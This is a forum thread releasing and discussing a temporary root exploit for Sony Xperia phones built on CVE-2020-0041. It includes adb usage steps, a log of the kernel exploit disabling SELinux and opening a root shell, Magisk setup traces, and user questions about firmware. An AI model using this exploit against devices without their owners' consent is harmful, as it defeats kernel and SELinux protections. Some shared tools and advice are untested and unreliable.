[XZ2/XZ2c/XZ2p/XZ3] temp root exploit via CVE-2020-0041 including magisk setup

Search This thread

xperia_lily

New member
Feb 20, 2022
3
0
@jal3223, just uploaded the two fw versions you have requested:
H8116_Customized IBE_1313-3189_52.1.A.0.618_R3C
H8166_Customized FR_1313-2540_52.1.A.0.618_R4C.zip
H8216_Customized UK_1313-4679_52.1.A.0.618_R5C
H8266_Customized FR_1313-2481_52.1.A.0.618_R4C.zip
H8296_Customized TW_1313-6119_52.1.A.0.618_R4C
H8314_Customized FR_1313-2468_52.1.A.0.618_R4C.zip
H8324_Customized FR_1313-2469_52.1.A.0.618_R2C.zip
H8416_Customized IBE_1316-6423_52.1.A.0.618_R5C
H9436_Customized FR_1316-3076_52.1.A.0.618_R6C
H9493_Customized HK_1316-2331_52.1.A.0.532_R2C
--- edit ---
added links to the first post too

Could you upload H8296-52.1.A.0.618 - xperia XZ2 dual and H8296_Customized TW_1313-6119_52.1.A.0.618_R4C.
 

DikanR

New member
Dec 5, 2018
1
1
CHANGELOG
  • 2020-05-14 : released initial version of tama-root (no magisk support, problem with 'Required key not available' returned from some commands)
  • 2020-05-22 : finally got magisk from temp root working including permission asking feature - released as tama-mroot.zip
i am very happy with this root method. but is it possible to have tama-mroot updated to the new version? because when i tried to update the root myself with the magisk app, it always broke my phone. the new magisk root version has zygisk and i really need it. and i would very thankful if the tama-mroot could be updated.
 
  • Like
Reactions: uzairale
@j4nn I tried to replace one of the list firmware with my firmware and got results like this
./data/local/tmp/tama-mroot
[+] Detected SO-04K-52.1.B.0.188 target
[+] Mapped 200000
[+] selinux_enforcing before exploit: 1
[+] pipe file: 0xffffffef7242a700
[+] file epitem at ffffffef247c0e80
[+] Reallocating content of 'write8_inode' with controlled data.....[DONE]
[+] Overwriting 0xffffffef7242a720 with 0xffffffef247c0ed0...[DONE]
[+] Write done, should have arbitrary read now.
[+] file operations: ffffff8e8801ebf8
[+] kernel base: ffffff8e86e80000
[+] Reallocating content of 'write8_selinux' with controlled data.[DONE]
[+] Overwriting 0xffffff8e89290000 with 0x0...[DONE]
[+] init_cred: ffffff8e8902fcd0
[+] memstart_addr: 0x752f544e41495241
[+] First level entry: ee122003 -> next table at fffffff2acc8cdbf

Then reboots itself, does this have a chance for temproot?
Hi rdhany, can you show me how to replace the firmware list? Iam using xz3 softbank.
 

mak6021

Senior Member
Nov 26, 2016
76
22
39
Polotsk
Hello, can I use magisk modules?
And what buns can you make in your xz2?
No harm to the system on the locked bootloader, thanks.
How to run via terminal to run root? more details? through the pc received No problem.
 
Last edited:

seyrarms

Senior Member
Firmware SO-04K-52.1.B.0.188 it uses Android 10. But this firmware can only be obtained with ota update, I've tried in the same way add android 9 firmware list to the exploit, which can be downloaded manually, but nothing happens. So I don't think it can be exploited.
Hello u can find this rom if u using Xperia Companion. They have option for repair and u get a rom after they downloaded for repairing ur device.
 

xz3user

New member
Jun 23, 2022
3
1
Hi everyone, I need some help here with my XZ3 SOV39 variant. I've downgraded from the latest SOV39 ROM to the global ROM mentioned in the top post using newflasher tool. I've successfully installed the Oneplus launcher into the oem folder and enabled the gesture navigation using the temp root method. However, my phone has lost the VoLTE function in the meantime after flashing the global FW.

So my questions are,
1. What are the steps to upgrade the firmware to the latest version without modifying the oem folder and losing the launcher?
2. Is the availability of VoLTE strictly tied to the OEM version or the firmware version?
3. Is there anyway to fix the VoLTE using the temp root method, for example Magisk modules? If not, would VoLTE work again if I flash the latest global firmware with the original Japan OEM partition?
 
Last edited:
  • Like
Reactions: uzairale

xz3user

New member
Jun 23, 2022
3
1
Does anyone know how to flash Japanese AU OEM part into the temp root target firmware? I was getting bootloops when I tried to do that.
 

j4nn

Senior Member
Jan 4, 2012
1,237
2,461
Could you upload H8296-52.1.A.0.618 - xperia XZ2 dual and H8296_Customized TW_1313-6119_52.1.A.0.618_R4C.
just uploaded the fw version you have requested:
H8116_Customized IBE_1313-3189_52.1.A.0.618_R3C
H8166_Customized FR_1313-2540_52.1.A.0.618_R4C.zip
H8216_Customized UK_1313-4679_52.1.A.0.618_R5C
H8266_Customized FR_1313-2481_52.1.A.0.618_R4C.zip
H8296_Customized TW_1313-6119_52.1.A.0.618_R4C
H8314_Customized FR_1313-2468_52.1.A.0.618_R4C.zip
H8324_Customized FR_1313-2469_52.1.A.0.618_R2C.zip
H8416_Customized IBE_1316-6423_52.1.A.0.618_R5C
H9436_Customized FR_1316-3076_52.1.A.0.618_R6C
H9493_Customized HK_1316-2331_52.1.A.0.532_R2C
and added to the first post too
 

yosia_ryan

Member
Jan 7, 2019
18
6
21
Sony Xperia XZ2 Premium
Hello, I know from someone that version 52.1.B.0.188
sony xz2compact docomo (SO-05K)
can be temprooted.

I already got
boot /kernel,abl,aop,bloototh a10 version 52.1.B.0.188 (SO-05K).
can someone develop and build an exploit for xz2c ( SO-05K) please help me :)
 

Attachments

  • bootxz2c.img
    64 MB · Views: 16
  • hasil extact.py a10 188.zip
    23.8 MB · Views: 14
Last edited:

uzairale

Member
Jul 30, 2021
17
1
i am very happy with this root method. but is it possible to have tama-mroot updated to the new version? because when i tried to update the root myself with the magisk app, it always broke my phone. the new magisk root version has zygisk and i really need it. and i would very thankful if the tama-mroot could be updated.
Hey
Its finally possible to update magisk on temprooted xz3 and other devices.
I will publish a post
 
  • Like
Reactions: DikanR

uzairale

Member
Jul 30, 2021
17
1
Hello, I know from someone that version 52.1.B.0.188
sony xz2compact docomo (SO-05K)
can be temprooted.

I already got
boot /kernel,abl,aop,bloototh a10 version 52.1.B.0.188 (SO-05K).
can someone develop and build an exploit for xz2c ( SO-05K) please help me :)
Why not you just crossflash to target version of xz2c and get temproot .
It's simply as easy as pie
 

uzairale

Member
Jul 30, 2021
17
1
Hi everyone, I need some help here with my XZ3 SOV39 variant. I've downgraded from the latest SOV39 ROM to the global ROM mentioned in the top post using newflasher tool. I've successfully installed the Oneplus launcher into the oem folder and enabled the gesture navigation using the temp root method. However, my phone has lost the VoLTE function in the meantime after flashing the global FW.

So my questions are,
1. What are the steps to upgrade the firmware to the latest version without modifying the oem folder and losing the launcher?
2. Is the availability of VoLTE strictly tied to the OEM version or the firmware version?
3. Is there anyway to fix the VoLTE using the temp root method, for example Magisk modules? If not, would VoLTE work again if I flash the latest global firmware with the original Japan OEM partition?
No that's not possible
It wil surely break system
You have to sacrifice and lose VoLTE if you want temproot
 

uzairale

Member
Jul 30, 2021
17
1
Its possible to unlock bootloader on xperia xz2 that running temproot? I have xperia xz2 but bootloader unlock allowed is no, another one lg v50 that running temproot can be unlock bootloader with xbl partition
You can try with this app if you have xbl partition backed up from bootloader unlocked device
It have partition manager and it is working
I dont know if it will work or not
 

Attachments

  • La.apk
    2.5 MB · Views: 7

seyrarms

Senior Member
It is onlly possible for global version
You have to crossflash to targeted global version fw if you want temproot
And you will lose VoLTE
Nope I'm already using temproot for XZ3 AU SOV39 without using rom Global 😂 it's ok, maybe at soon I'm make tutorial use for docomo, softbank and au temproot in xda. Btw for volte it's not lose for my country can be used since IMS not registered so I need time for fix this
 

Attachments

  • _20220813_150006.JPG
    _20220813_150006.JPG
    176.3 KB · Views: 17
  • Screenshot_20220813-145113.png
    Screenshot_20220813-145113.png
    155 KB · Views: 18

uzairale

Member
Jul 30, 2021
17
1
Nope I'm already using temproot for XZ3 AU SOV39 without using rom Global 😂 it's ok, maybe at soon I'm make tutorial use for docomo, softbank and au temproot in xda. Btw for volte it's not lose for my country can be used since IMS not registered so I need time for fix this
Glad to know that
Btw is there any possibility to unlock bootloader without s1unlock tool
And how can we boot into edl mode.
it was possible for lg v50 i think by flashing xbl partition backed up from unlocked device

Having non unlockable bootloader device is headache.
Im gonna never buy sony mobiles again😑😑
 

Top Liked Posts

  • There are no posts matching your filters.
  • 33
    temp root exploit for sony xperia XZ2/XZ2c/XZ2p/XZ3 with android 10 firmware
    including temporal magisk setup from the exploit


    The exploit uses CVE-2020-0041 originally designed for Pixel 3 running kernel 4.9.
    I have adapted the Pixel 3 specific exploit for kernel 4.9 that is used with sony TAMA platform phones running Android 10 with February 2020 security patch level.

    SUPPORTED TARGETS
    This has been tested only with xperia XZ2 H8216-52.1.A.0.618 target, but support for other targets have been implemented based on analysis of each kernel image from target firmware.
    Please note, it is unlikely that any other fw version than those listed above would work.
    The only (unlikely) case when the exploit could work with different fw version (or different phone model) would be that they would use binary identical kernel image in the firmware.

    USAGE HOWTO INCLUDING MAGISK SETUP
    • be sure to run supported firmware version on your phone (you may need to downgrade, involving factory reset)
    • enable developer mode options and in there adb debugging (eventually install adb drivers)
    • download the tama-mroot.zip with the exploit attached in this post
    • download Magisk-v20.4.zip from magisk releases page on github here
    • use 'adb push tama-mroot.zip Magisk-v20.4.zip /data/local/tmp' to copy the zips to the phone
    • unzip and prepare magisk setup with following commands in 'adb shell'
      Code:
      cd /data/local/tmp
      unzip tama-mroot.zip
      chmod 755 tama-mroot magisk-setup.sh magisk-start.sh
      ./magisk-setup.sh
    • get temp root and start magisk up with following commands in 'adb shell':
      Code:
      cd /data/local/tmp
      ./tama-mroot
      ./magisk-start.sh -1
      ./magisk-start.sh -2
      ./magisk-start.sh -3

    If it worked, you should see something like this:

    Code:
    H8216:/ $ cd /data/local/tmp
    H8216:/data/local/tmp $ ./tama-mroot                                                                                                                                                                           
    [+] Detected H8216-52.1.A.0.618 target
    [+] Mapped 200000
    [+] selinux_enforcing before exploit: 1
    [+] pipe file: 0xffffffd07822fa00
    [+] file epitem at ffffffd102da6d00
    [+] Reallocating content of 'write8_inode' with controlled data...............[DONE]
    [+] Overwriting 0xffffffd07822fa20 with 0xffffffd102da6d50...[DONE]
    [+] Write done, should have arbitrary read now.
    [+] file operations: ffffff9dee01ebf8
    [+] kernel base: ffffff9dece80000
    [+] Reallocating content of 'write8_selinux' with controlled data..[DONE]
    [+] Overwriting 0xffffff9def290000 with 0x0...[DONE]
    [+] init_cred: ffffff9def02fcd0
    [+] memstart_addr: 0xfffffff040000000
    [+] First level entry: ae7f6003 -> next table at ffffffd06e7f6000
    [+] Second level entry: ae419003 -> next table at ffffffd06e419000
    [+] sysctl_table_root = ffffff9def05c710
    [+] Reallocating content of 'write8_sysctl' with controlled data.......[DONE]
    [+] Overwriting 0xffffffd1316fc268 with 0xffffffd0ba748000...[DONE]
    [+] Injected sysctl node!
    [+] Node write8_inode, pid 7109, kaddr ffffffd0c1193700
    [+] Replaced sendmmsg dangling reference
    [+] Replaced sendmmsg dangling reference
    [+] Replaced sendmmsg dangling reference
    [+] Node write8_selinux, pid 6726, kaddr ffffffd08bfeb400
    [+] Replaced sendmmsg dangling reference
    [+] Replaced sendmmsg dangling reference
    [+] Replaced sendmmsg dangling reference
    [+] Node write8_sysctl, pid 6772, kaddr ffffffd0afc0d000
    [+] Replaced sendmmsg dangling reference
    [+] Replaced sendmmsg dangling reference
    [+] Replaced sendmmsg dangling reference
    [+] Cleaned up sendmsg threads
    [+] epitem.next = ffffffd07822fa20
    [+] epitem.prev = ffffffd07822fad8
    [+] Launching privileged shell
    root_by_cve-2020-0041:/data/local/tmp # ./magisk-start.sh -1                                                                                                                                                   
    + FRESH=false
    + '[' -1 '=' --fresh ']'
    + '[' ! -e /data/adb/magisk/busybox ']'
    + ./magiskpolicy --live --magisk 'allow dumpstate * * *'
    Load policy from: /sys/fs/selinux/policy
    root_by_cve-2020-0041:/data/local/tmp # ./magisk-start.sh -2                                                                                                                                                   
    + FRESH=false
    + '[' -2 '=' --fresh ']'
    + '[' ! -e /data/adb/magisk/busybox ']'
    + STAGE=2
    + '[' 2 '=' 2 ']'
    + mount -t tmpfs -o 'mode=755' none /sbin
    + chcon u:object_r:rootfs:s0 /sbin
    + chmod 755 /sbin
    + cp -a magisk/boot_patch.sh /sbin
    + cp -a magisk/magiskboot /sbin
    + cp -a magisk/magiskinit64 /sbin
    + cp -a magisk/busybox /sbin
    + cp -a magisk/util_functions.sh /sbin
    + cd /sbin
    + chmod 755 boot_patch.sh busybox magiskboot magiskinit64 util_functions.sh
    + mkdir r
    + mount -o bind / r
    + cp -a r/sbin/. /sbin
    + umount r
    + rmdir r
    + mv magiskinit64 magiskinit
    + ./magiskinit -x magisk magisk
    + ln -s /sbin/magiskinit /sbin/magiskpolicy
    + ln -s /sbin/magiskinit /sbin/supolicy
    + false
    + chcon -R u:object_r:magisk_file:s0 /data/adb/magisk
    + rm -f magiskboot util_functions.sh boot_patch.sh
    + ln -s /sbin/magisk /sbin/su
    + ln -s /sbin/magisk /sbin/resetprop
    + ln -s /sbin/magisk /sbin/magiskhide
    + mkdir /sbin/.magisk
    + chmod 755 /sbin/.magisk
    + >/sbin/.magisk/config
    + echo 'KEEPVERITY=true'
    + >>/sbin/.magisk/config
    + echo 'KEEPFORCEENCRYPT=true'
    + chmod 000 /sbin/.magisk/config
    + mkdir -p /sbin/.magisk/busybox
    + chmod 755 /sbin/.magisk/busybox
    + mv busybox /sbin/.magisk/busybox
    + mkdir -p /sbin/.magisk/mirror
    + chmod 000 /sbin/.magisk/mirror
    + mkdir -p /sbin/.magisk/block
    + chmod 000 /sbin/.magisk/block
    + mkdir -p /sbin/.magisk/modules
    + chmod 755 /sbin/.magisk/modules
    + mkdir -p /data/adb/modules
    + chmod 755 /data/adb/modules
    + mkdir -p /data/adb/post-fs-data.d
    + chmod 755 /data/adb/post-fs-data.d
    + mkdir -p /data/adb/service.d
    + chmod 755 /data/adb/service.d
    + chcon -R -h u:object_r:rootfs:s0 /sbin/.magisk
    + chcon u:object_r:magisk_file:s0 /sbin/.magisk/busybox/busybox
    + /sbin/magisk --daemon
    client: launching new main daemon process
    + pidof magiskd
    + MP=14148
    + '[' -z 14148 ']'
    + >/sbin/.magisk/escalate
    + echo 14148
    + '[' -e /sbin/.magisk/escalate ']'
    + sleep 1
    + '[' -e /sbin/.magisk/escalate ']'
    root_by_cve-2020-0041:/data/local/tmp # ./magisk-start.sh -3                                                                                                                                                   
    + FRESH=false
    + '[' -3 '=' --fresh ']'
    + '[' ! -e /data/adb/magisk/busybox ']'
    + STAGE=3
    + '[' 3 '=' 2 ']'
    + >/sbin/.magisk/magiskd
    + echo -e '#!/system/bin/sh\n/sbin/magisk --daemon'
    + chmod 755 /sbin/.magisk/magiskd
    + chcon u:object_r:dumpstate_exec:s0 /sbin/.magisk/magiskd
    + getprop init.svc.dumpstate
    + SVC=''
    + timeout=10
    + '[' 10 -gt 0 ']'
    + stop dumpstate
    + killall -9 magiskd
    + stop dumpstate
    + mount -o bind /sbin/.magisk/magiskd /system/bin/dumpstate
    + start dumpstate
    + timeout=10
    + '[' 10 -le 0 ']'
    + pidof magiskd
    + MP=14165
    + '[' -n 14165 ']'
    + break
    + stop dumpstate
    + sleep 1
    + umount /system/bin/dumpstate
    + rm -f /sbin/.magisk/magiskd
    + '[' '' '=' running ']'
    + rm -f /dev/.magisk_unblock
    + /sbin/magisk --post-fs-data
    + timeout=10
    + '[' -e /dev/.magisk_unblock -o 10 -le 0 ']'
    + sleep 1
    + timeout=9
    + '[' -e /dev/.magisk_unblock -o 9 -le 0 ']'
    + /sbin/magisk --service
    + sleep 1
    + /sbin/magisk --boot-complete
    + chmod 751 /sbin
    root_by_cve-2020-0041:/data/local/tmp # id                                                                                                                                                                     
    uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc),3011(uhid) context=u:r:magisk:s0
    root_by_cve-2020-0041:/data/local/tmp # uname -a
    Linux localhost 4.9.186-perf+ #1 SMP PREEMPT Fri Jan 17 01:22:05 2020 aarch64
    root_by_cve-2020-0041:/data/local/tmp # getenforce                                                                                                                                                             
    Permissive


    Now you can exit the temp root shell and use 'su' to get a root shell controlled by magisk manager or allow other apps that need root as asking for root permission now works.
    The magisk setup from exploit including working permission asking has been fully developed by me, it uses some novel techniques to overcome the limitations caused by magisk run from a temp root instead of being integrated in boot process as a service.

    Please be careful what you use the temp root for.
    Changing something in partitions protected by dm-verity (or Android Verified Boot 2.0), like for example /system, /vendor or kernel boot image, can result with a not anymore booting phone.
    This is why it is called 'temp root' - you get a root shell only temporarily, it is lost with reboot and it does not allow to make permanent changes in crucial partitions - you would need to unlock bootloader for that.
    Some partitions might still be possible to modify - for example in case of sony xperia xz1 phones it was possible to do permanent debloat via changes in /oem partition and such debloat would survive even factory reset. Similarly some modem configs have been present in /oem allowing to setup IMS for different operators/regions or tune other modem related stuff.

    Please note, this exploit will get you a root shell with still locked TAMA platform phones that could allow to backup TA partition in still locked state, having drm keys (the device key) still there. Backup of TA partition now works with tama-mroot avoiding 'Required key not available' you could experience with previously released tama-root.
    There is currently no known method though how to restore drm functionalities after bootloader unlock even after restoring TA partition from the locked state backup.
    For details please check exploiting xperia XZ2 - good and bad news post and following discussion there.

    SOURCES
    Exploit sources for all releases are available at my github here.

    CREDITS
    Big thanks to Blue Frost Security for the excellent writeup and the exploit itself.

    DONATIONS
    If you like my work, you can donate using the Donate to Me button with several methods there.
    Thank you very much to all who donate.

    DOWNLOAD
    7
    implemented magisk setup from temproot

    finally got magisk from temp root working including permission asking feature - released as tama-mroot.zip - get it here
    5
    CHANGELOG
    • 2020-05-14 : released initial version of tama-root (no magisk support, problem with 'Required key not available' returned from some commands)
    • 2020-05-22 : finally got magisk from temp root working including permission asking feature - released as tama-mroot.zip
    5
    As it seems .618 fw versions get missing from xperifirm, please let me know if you need some - I still have following:
    H8116_Customized IBE_1313-3189_52.1.A.0.618_R3C
    H8166_Customized FR_1313-2540_52.1.A.0.618_R4C
    H8216_Customized UK_1313-4679_52.1.A.0.618_R5C
    H8266_Customized FR_1313-2481_52.1.A.0.618_R4C
    H8296_Customized TW_1313-6119_52.1.A.0.618_R4C
    H8314_Customized FR_1313-2468_52.1.A.0.618_R4C
    H8324_Customized FR_1313-2469_52.1.A.0.618_R2C
    H8416_Customized IBE_1316-6423_52.1.A.0.618_R5C
    H9436_Customized FR_1316-3076_52.1.A.0.618_R6C
    H9493_Customized HK_1316-2331_52.1.A.0.532_R2C
    so I may upload it on request.
    4
    So you did it again! You are insane mate!!
    Respect.